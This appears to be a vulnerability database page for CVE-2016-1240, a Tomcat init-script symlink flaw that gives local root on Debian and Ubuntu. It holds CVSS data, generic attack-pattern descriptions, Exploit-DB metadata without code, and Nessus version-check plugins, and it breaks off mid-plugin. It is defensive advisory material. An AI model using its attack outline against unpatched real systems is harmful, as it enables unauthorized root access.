Vulnerabilities > CVE-2016-1240 - Improper Input Validation vulnerability in Apache Tomcat 6.0/7.0/8.0

047910
CVSS 7.8 - HIGH
Attack vector
LOCAL
Attack complexity
LOW
Privileges required
LOW
Confidentiality impact
HIGH
Integrity impact
HIGH
Availability impact
HIGH
local
low complexity
apache
CWE-20
nessus
exploit available

Summary

The Tomcat init script in the tomcat7 package before 7.0.56-3+deb8u4 and tomcat8 package before 8.0.14-1+deb8u3 on Debian jessie and the tomcat6 and libtomcat6-java packages before 6.0.35-1ubuntu3.8 on Ubuntu 12.04 LTS, the tomcat7 and libtomcat7-java packages before 7.0.52-1ubuntu0.7 on Ubuntu 14.04 LTS, and tomcat8 and libtomcat8-java packages before 8.0.32-1ubuntu1.2 on Ubuntu 16.04 LTS allows local users with access to the tomcat account to gain root privileges via a symlink attack on the Catalina log file, as demonstrated by /var/log/tomcat7/catalina.out.

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Buffer Overflow via Environment Variables
    This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.
  • Server Side Include (SSI) Injection
    An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands.
  • Cross Zone Scripting
    An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security. In a zone-based model, pages belong to one of a set of zones corresponding to the level of privilege assigned to that page. Pages in an untrusted zone would have a lesser level of access to the system and/or be restricted in the types of executable content it was allowed to invoke. In a cross-zone scripting attack, a page that should be assigned to a less privileged zone is granted the privileges of a more trusted zone. This can be accomplished by exploiting bugs in the browser, exploiting incorrect configuration in the zone controls, through a cross-site scripting attack that causes the attackers' content to be treated as coming from a more trusted page, or by leveraging some piece of system functionality that is accessible from both the trusted and less trusted zone. This attack differs from "Restful Privilege Escalation" in that the latter correlates to the inadequate securing of RESTful access methods (such as HTTP DELETE) on the server, while cross-zone scripting attacks the concept of security zones as implemented by a browser.
  • Cross Site Scripting through Log Files
    An attacker may leverage a system weakness where logs are susceptible to log injection to insert scripts into the system's logs. If these logs are later viewed by an administrator through a thin administrative interface and the log data is not properly HTML encoded before being written to the page, the attackers' scripts stored in the log will be executed in the administrative interface with potentially serious consequences. This attack pattern is really a combination of two other attack patterns: log injection and stored cross site scripting.
  • Command Line Execution through SQL Injection
    An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.

Exploit-Db

descriptionApache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation. CVE-2016-1240. Local exploit for Linux platform
fileexploits/linux/local/40450.txt
idEDB-ID:40450
last seen2016-10-04
modified2016-10-03
platformlinux
port
published2016-10-03
reporterDawid Golunski
sourcehttps://www.exploit-db.com/download/40450/
titleApache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation
typelocal

Nessus

  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DLA-622.NASL
    descriptionDawid Golunski from legalhackers.com discovered that Debian
    last seen2020-03-17
    modified2016-09-16
    plugin id93544
    published2016-09-16
    reporterThis script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93544
    titleDebian DLA-622-1 : tomcat6 security update
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Debian Security Advisory DLA-622-1. The text
    # itself is copyright (C) Software in the Public Interest, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(93544);
      script_version("2.9");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/03/12");
    
      script_cve_id("CVE-2016-1240");
    
      script_name(english:"Debian DLA-622-1 : tomcat6 security update");
      script_summary(english:"Checks dpkg output for the updated packages.");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Debian host is missing a security update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Dawid Golunski from legalhackers.com discovered that Debian's version
    of Tomcat 6 was vulnerable to a local privilege escalation. Local
    attackers who have gained access to the server in the context of the
    tomcat6 user through a vulnerability in a web application were able to
    replace the file with a symlink to an arbitrary file.
    
    The full advisory can be found at
    
    http://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-
    Es calation-Exploit.txt
    
    For Debian 7 'Wheezy', these problems have been fixed in version
    6.0.45+dfsg-1~deb7u2.
    
    We recommend that you upgrade your tomcat6 packages.
    
    NOTE: Tenable Network Security has extracted the preceding description
    block directly from the DLA security advisory. Tenable has attempted
    to automatically clean and format it as much as possible without
    introducing additional issues."
      );
      # http://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-Es
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?c0b304c1"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://lists.debian.org/debian-lts-announce/2016/09/msg00015.html"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://packages.debian.org/source/wheezy/tomcat6"
      );
      script_set_attribute(attribute:"solution", value:"Upgrade the affected packages.");
      script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:libservlet2.4-java");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:libservlet2.5-java");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:libservlet2.5-java-doc");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:libtomcat6-java");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:tomcat6");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:tomcat6-admin");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:tomcat6-common");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:tomcat6-docs");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:tomcat6-examples");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:tomcat6-extras");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:tomcat6-user");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:7.0");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2016/09/15");
      script_set_attribute(attribute:"plugin_publication_date", value:"2016/09/16");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Debian Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("debian_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
    if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    if (deb_check(release:"7.0", prefix:"libservlet2.4-java", reference:"6.0.45+dfsg-1~deb7u2")) flag++;
    if (deb_check(release:"7.0", prefix:"libservlet2.5-java", reference:"6.0.45+dfsg-1~deb7u2")) flag++;
    if (deb_check(release:"7.0", prefix:"libservlet2.5-java-doc", reference:"6.0.45+dfsg-1~deb7u2")) flag++;
    if (deb_check(release:"7.0", prefix:"libtomcat6-java", reference:"6.0.45+dfsg-1~deb7u2")) flag++;
    if (deb_check(release:"7.0", prefix:"tomcat6", reference:"6.0.45+dfsg-1~deb7u2")) flag++;
    if (deb_check(release:"7.0", prefix:"tomcat6-admin", reference:"6.0.45+dfsg-1~deb7u2")) flag++;
    if (deb_check(release:"7.0", prefix:"tomcat6-common", reference:"6.0.45+dfsg-1~deb7u2")) flag++;
    if (deb_check(release:"7.0", prefix:"tomcat6-docs", reference:"6.0.45+dfsg-1~deb7u2")) flag++;
    if (deb_check(release:"7.0", prefix:"tomcat6-examples", reference:"6.0.45+dfsg-1~deb7u2")) flag++;
    if (deb_check(release:"7.0", prefix:"tomcat6-extras", reference:"6.0.45+dfsg-1~deb7u2")) flag++;
    if (deb_check(release:"7.0", prefix:"tomcat6-user", reference:"6.0.45+dfsg-1~deb7u2")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
      else security_hole(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DSA-3670.NASL
    descriptionDawid Golunski of LegalHackers discovered that the Tomcat init script performed unsafe file handling, which could result in local privilege escalation.
    last seen2020-06-01
    modified2020-06-02
    plugin id93549
    published2016-09-16
    reporterThis script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93549
    titleDebian DSA-3670-1 : tomcat8 - security update
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Debian Security Advisory DSA-3670. The text 
    # itself is copyright (C) Software in the Public Interest, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(93549);
      script_version("2.7");
      script_cvs_date("Date: 2018/11/10 11:49:38");
    
      script_cve_id("CVE-2016-1240");
      script_xref(name:"DSA", value:"3670");
    
      script_name(english:"Debian DSA-3670-1 : tomcat8 - security update");
      script_summary(english:"Checks dpkg output for the updated package");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Debian host is missing a security-related update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Dawid Golunski of LegalHackers discovered that the Tomcat init script
    performed unsafe file handling, which could result in local privilege
    escalation."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://packages.debian.org/source/jessie/tomcat8"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.debian.org/security/2016/dsa-3670"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "Upgrade the tomcat8 packages.
    
    For the stable distribution (jessie), this problem has been fixed in
    version 8.0.14-1+deb8u3."
      );
      script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:tomcat8");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:8.0");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2016/09/15");
      script_set_attribute(attribute:"plugin_publication_date", value:"2016/09/16");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Debian Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("debian_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
    if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    if (deb_check(release:"8.0", prefix:"libservlet3.1-java", reference:"8.0.14-1+deb8u3")) flag++;
    if (deb_check(release:"8.0", prefix:"libservlet3.1-java-doc", reference:"8.0.14-1+deb8u3")) flag++;
    if (deb_check(release:"8.0", prefix:"libtomcat8-java", reference:"8.0.14-1+deb8u3")) flag++;
    if (deb_check(release:"8.0", prefix:"tomcat8", reference:"8.0.14-1+deb8u3")) flag++;
    if (deb_check(release:"8.0", prefix:"tomcat8-admin", reference:"8.0.14-1+deb8u3")) flag++;
    if (deb_check(release:"8.0", prefix:"tomcat8-common", reference:"8.0.14-1+deb8u3")) flag++;
    if (deb_check(release:"8.0", prefix:"tomcat8-docs", reference:"8.0.14-1+deb8u3")) flag++;
    if (deb_check(release:"8.0", prefix:"tomcat8-examples", reference:"8.0.14-1+deb8u3")) flag++;
    if (deb_check(release:"8.0", prefix:"tomcat8-user", reference:"8.0.14-1+deb8u3")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
      else security_hole(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL familyUbuntu Local Security Checks
    NASL idUBUNTU_USN-3081-1.NASL
    descriptionDawid Golunski discovered that the Tomcat init script incorrectly handled creating log files. A remote attacker could possibly use this issue to obtain root privileges. (CVE-2016-1240) This update also reverts a change in behaviour introduced in USN-3024-1 by setting mapperContextRootRedirectEnabled to True by default. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id93600
    published2016-09-20
    reporterUbuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93600
    titleUbuntu 12.04 LTS / 14.04 LTS / 16.04 LTS : tomcat6, tomcat7, tomcat8 vulnerability (USN-3081-1)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Ubuntu Security Notice USN-3081-1. The text 
    # itself is copyright (C) Canonical, Inc. See 
    # <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered 
    # trademark of Canonical, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(93600);
      script_version("2.8");
      script_cvs_date("Date: 2019/09/18 12:31:46");
    
      script_cve_id("CVE-2016-1240");
      script_xref(name:"USN", value:"3081-1");
    
      script_name(english:"Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS : tomcat6, tomcat7, tomcat8 vulnerability (USN-3081-1)");
      script_summary(english:"Checks dpkg output for updated packages.");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote Ubuntu host is missing one or more security-related
    patches."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Dawid Golunski discovered that the Tomcat init script incorrectly
    handled creating log files. A remote attacker could possibly use this
    issue to obtain root privileges. (CVE-2016-1240)
    
    This update also reverts a change in behaviour introduced in
    USN-3024-1 by setting mapperContextRootRedirectEnabled to True by
    default.
    
    Note that Tenable Network Security has extracted the preceding
    description block directly from the Ubuntu security advisory. Tenable
    has attempted to automatically clean and format it as much as possible
    without introducing additional issues."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://usn.ubuntu.com/3081-1/"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected packages.");
      script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:libtomcat6-java");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:libtomcat7-java");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:libtomcat8-java");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:tomcat6");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:tomcat7");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:tomcat8");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:12.04:-:lts");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:14.04");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:16.04");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2016/10/03");
      script_set_attribute(attribute:"patch_publication_date", value:"2016/09/19");
      script_set_attribute(attribute:"plugin_publication_date", value:"2016/09/20");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Ubuntu Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/cpu", "Host/Ubuntu", "Host/Ubuntu/release", "Host/Debian/dpkg-l");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("ubuntu.inc");
    include("misc_func.inc");
    
    if ( ! get_kb_item("Host/local_checks_enabled") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/Ubuntu/release");
    if ( isnull(release) ) audit(AUDIT_OS_NOT, "Ubuntu");
    release = chomp(release);
    if (! preg(pattern:"^(12\.04|14\.04|16\.04)$", string:release)) audit(AUDIT_OS_NOT, "Ubuntu 12.04 / 14.04 / 16.04", "Ubuntu " + release);
    if ( ! get_kb_item("Host/Debian/dpkg-l") ) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Ubuntu", cpu);
    
    flag = 0;
    
    if (ubuntu_check(osver:"12.04", pkgname:"libtomcat6-java", pkgver:"6.0.35-1ubuntu3.8")) flag++;
    if (ubuntu_check(osver:"12.04", pkgname:"tomcat6", pkgver:"6.0.35-1ubuntu3.8")) flag++;
    if (ubuntu_check(osver:"14.04", pkgname:"libtomcat7-java", pkgver:"7.0.52-1ubuntu0.7")) flag++;
    if (ubuntu_check(osver:"14.04", pkgname:"tomcat7", pkgver:"7.0.52-1ubuntu0.7")) flag++;
    if (ubuntu_check(osver:"16.04", pkgname:"libtomcat8-java", pkgver:"8.0.32-1ubuntu1.2")) flag++;
    if (ubuntu_check(osver:"16.04", pkgname:"tomcat8", pkgver:"8.0.32-1ubuntu1.2")) flag++;
    
    if (flag)
    {
      security_report_v4(
        port       : 0,
        severity   : SECURITY_HOLE,
        extra      : ubuntu_report_get()
      );
      exit(0);
    }
    else
    {
      tested = ubuntu_pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "libtomcat6-java / libtomcat7-java / libtomcat8-java / tomcat6 / etc");
    }
    
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2017-0455.NASL
    descriptionAn update is now available for Red Hat JBoss Web Server 3 for RHEL 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library. This release of Red Hat JBoss Web Server 3.1.0 serves as a replacement for Red Hat JBoss Web Server 3.0.3, and includes enhancements. Security Fix(es) : * It was reported that the Tomcat init script performed unsafe file handling, which could result in local privilege escalation. (CVE-2016-1240) * It was discovered that the Tomcat packages installed certain configuration files read by the Tomcat initialization script as writeable to the tomcat group. A member of the group or a malicious web application deployed on Tomcat could use this flaw to escalate their privileges. (CVE-2016-6325) * The JmxRemoteLifecycleListener was not updated to take account of Oracle
    last seen2020-06-01
    modified2020-06-02
    plugin id97595
    published2017-03-08
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/97595
    titleRHEL 6 : Red Hat JBoss Web Server 3.1.0 (RHSA-2017:0455)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Red Hat Security Advisory RHSA-2017:0455. The text 
    # itself is copyright (C) Red Hat, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(97595);
      script_version("3.11");
      script_cvs_date("Date: 2019/10/24 15:35:42");
    
      script_cve_id("CVE-2016-0762", "CVE-2016-1240", "CVE-2016-3092", "CVE-2016-5018", "CVE-2016-6325", "CVE-2016-6794", "CVE-2016-6796", "CVE-2016-6797", "CVE-2016-6816", "CVE-2016-8735", "CVE-2016-8745");
      script_xref(name:"RHSA", value:"2017:0455");
    
      script_name(english:"RHEL 6 : Red Hat JBoss Web Server 3.1.0 (RHSA-2017:0455)");
      script_summary(english:"Checks the rpm output for the updated packages");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Red Hat host is missing one or more security updates."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "An update is now available for Red Hat JBoss Web Server 3 for RHEL 6.
    
    Red Hat Product Security has rated this update as having a security
    impact of Important. A Common Vulnerability Scoring System (CVSS) base
    score, which gives a detailed severity rating, is available for each
    vulnerability from the CVE link(s) in the References section.
    
    Red Hat JBoss Web Server is a fully integrated and certified set of
    components for hosting Java web applications. It is comprised of the
    Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat
    Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and
    the Tomcat Native library.
    
    This release of Red Hat JBoss Web Server 3.1.0 serves as a replacement
    for Red Hat JBoss Web Server 3.0.3, and includes enhancements.
    
    Security Fix(es) :
    
    * It was reported that the Tomcat init script performed unsafe file
    handling, which could result in local privilege escalation.
    (CVE-2016-1240)
    
    * It was discovered that the Tomcat packages installed certain
    configuration files read by the Tomcat initialization script as
    writeable to the tomcat group. A member of the group or a malicious
    web application deployed on Tomcat could use this flaw to escalate
    their privileges. (CVE-2016-6325)
    
    * The JmxRemoteLifecycleListener was not updated to take account of
    Oracle's fix for CVE-2016-3427. JMXRemoteLifecycleListener is only
    included in EWS 2.x and JWS 3.x source distributions. If you deploy a
    Tomcat instance built from source, using the EWS 2.x, or JWS 3.x
    distributions, an attacker could use this flaw to launch a remote code
    execution attack on your deployed instance. (CVE-2016-8735)
    
    * A denial of service vulnerability was identified in Commons
    FileUpload that occurred when the length of the multipart boundary was
    just below the size of the buffer (4096 bytes) used to read the
    uploaded file if the boundary was the typical tens of bytes long.
    (CVE-2016-3092)
    
    * It was discovered that the code that parsed the HTTP request line
    permitted invalid characters. This could be exploited, in conjunction
    with a proxy that also permitted the invalid characters but with a
    different interpretation, to inject data into the HTTP response. By
    manipulating the HTTP response the attacker could poison a web-cache,
    perform an XSS attack, or obtain sensitive information from requests
    other then their own. (CVE-2016-6816)
    
    * A bug was discovered in the error handling of the send file code for
    the NIO HTTP connector. This led to the current Processor object being
    added to the Processor cache multiple times allowing information
    leakage between requests including, and not limited to, session ID and
    the response body. (CVE-2016-8745)
    
    * The Realm implementations did not process the supplied password if
    the supplied user name did not exist. This made a timing attack
    possible to determine valid user names. Note that the default
    configuration includes the LockOutRealm which makes exploitation of
    this vulnerability harder. (CVE-2016-0762)
    
    * It was discovered that a malicious web application could bypass a
    configured SecurityManager via a Tomcat utility method that was
    accessible to web applications. (CVE-2016-5018)
    
    * It was discovered that when a SecurityManager is configured Tomcat's
    system property replacement feature for configuration files could be
    used by a malicious web application to bypass the SecurityManager and
    read system properties that should not be visible. (CVE-2016-6794)
    
    * It was discovered that a malicious web application could bypass a
    configured SecurityManager via manipulation of the configuration
    parameters for the JSP Servlet. (CVE-2016-6796)
    
    * It was discovered that it was possible for a web application to
    access any global JNDI resource whether an explicit ResourceLink had
    been configured or not. (CVE-2016-6797)
    
    The CVE-2016-6325 issue was discovered by Red Hat Product Security.
    
    Enhancement(s) :
    
    This enhancement update adds the Red Hat JBoss Web Server 3.1.0
    packages to Red Hat Enterprise Linux 6. These packages provide a
    number of enhancements over the previous version of Red Hat JBoss Web
    Server. (JIRA#JWS-267)
    
    Users of Red Hat JBoss Web Server are advised to upgrade to these
    updated packages, which add this enhancement."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/errata/RHSA-2017:0455"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2016-0762"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2016-1240"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2016-3092"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2016-5018"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2016-6325"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2016-6794"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2016-6796"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2016-6797"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2016-6816"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2016-8735"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2016-8745"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected packages.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate4-c3p0-eap6");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate4-core-eap6");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate4-eap6");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate4-entitymanager-eap6");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate4-envers-eap6");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-apache-commons-daemon");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-apache-commons-daemon-jsvc");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-apache-commons-daemon-jsvc-debuginfo");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-runtime");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:mod_cluster");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat7");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat8");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat-native");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat-native-debuginfo");
